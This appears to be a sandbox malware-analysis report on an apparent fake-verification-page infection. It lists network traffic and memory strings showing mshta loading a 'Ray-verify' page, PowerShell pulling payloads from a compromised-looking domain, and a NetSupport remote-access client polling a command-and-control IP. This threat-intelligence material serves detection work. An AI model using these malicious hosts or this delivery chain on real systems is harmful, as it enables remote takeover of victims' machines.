                                  Source: global trafficDNS traffic detected: DNS query: traversecityspringbreak.com
                                  Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: unknownHTTP traffic detected: POST http://92.255.85.135/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 92.255.85.135Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Mon, 28 Oct 2024 18:45:15 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 284Connection: close
                                  Source: client32.exe, client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.drString found in binary or memory: http://%s/fakeurl.htm
                                  Source: client32.exe, client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.drString found in binary or memory: http://%s/testpage.htm
                                  Source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                  Source: client32.exe, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://127.0.0.1
                                  Source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                  Source: remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                  Source: powershell.exe, 0000000C.00000002.2018709421.000002F279A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                                  Source: chromecache_83.1.drString found in binary or memory: http://fontawesome.com
                                  Source: chromecache_83.1.drString found in binary or memory: http://fontawesome.com/license
                                  Source: client32.exe, 00000015.00000003.2277891273.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000015.00000002.2418160044.00000000061A2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2417429700.0000000006110000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.2277891273.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                  Source: client32.exe, 00000015.00000002.2418160044.00000000061A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp1j
                                  Source: client32.exe, 00000015.00000002.2417429700.0000000006110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspD
                                  Source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                  Source: client32.exe, 00000015.00000003.2277891273.00000000013DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asphn
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                  Source: remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://s2.symcb.com0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                  Source: remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://sv.symcd.com0&
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F200E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/1.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/10.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/11.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/12.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/2.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/3.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/4.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/5.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/6.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/7.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/8.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/9.png
                                  Source: powershell.exe, 0000000C.00000002.2015699992.000002F277C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/o.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.comp
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                  Source: client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                  Source: client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://www.pci.co.uk/support
                                  Source: client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                  Source: mshta.exe, 0000000B.00000003.1756113861.00000254956E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1757874634.0000025C98246000.00000004.00000020.00020000.00000000.sdmp, Ray-verify[1].htm.11.dr, chromecache_88.1.drString found in binary or memory: http://www.protware.com
                                  Source: mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                                  Source: mshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/#
                                  Source: mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.comv1
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://www.symauth.com/cps0(
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://www.symauth.com/rpa00
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200E4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                  Source: mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/N
                                  Source: mshta.exe, 0000000B.00000002.1763511986.00000254955F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1765173131.00000254958C0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1763718088.000002549561F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html
                                  Source: mshta.exe, 0000000B.00000002.1765266374.0000025495940000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1768096542.0000025C9C990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html#?
                                  Source: mshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html...I
                                  Source: mshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html...P
                                  Source: mshta.exe, 0000000B.00000003.1759981197.0000025C9831D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlEOBsOVUOCByEBKVfVxgwGKHgImTJOhITa
                                  Source: mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlINetCookies
                                  Source: mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlVVC:
                                  Source: mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html_
                                  Source: mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmld
                                  Source: mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmldV
                                  Source: mshta.exe, 0000000B.00000003.1759981197.0000025C98313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlhttps://inspyrehomedesign.com/Ray-verify.html
                                  Source: mshta.exe, 0000000B.00000003.1762856955.0000025495615000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1763718088.0000025495627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlp
                                  Source: mshta.exe, 0000000B.00000003.1762367642.0000025495694000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/m
                                  Source: mshta.exe, 0000000B.00000003.1762367642.0000025495694000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49714 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49723 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49724 version: TLS 1.2
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,21_2_1101F6B0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,21_2_1101F6B0
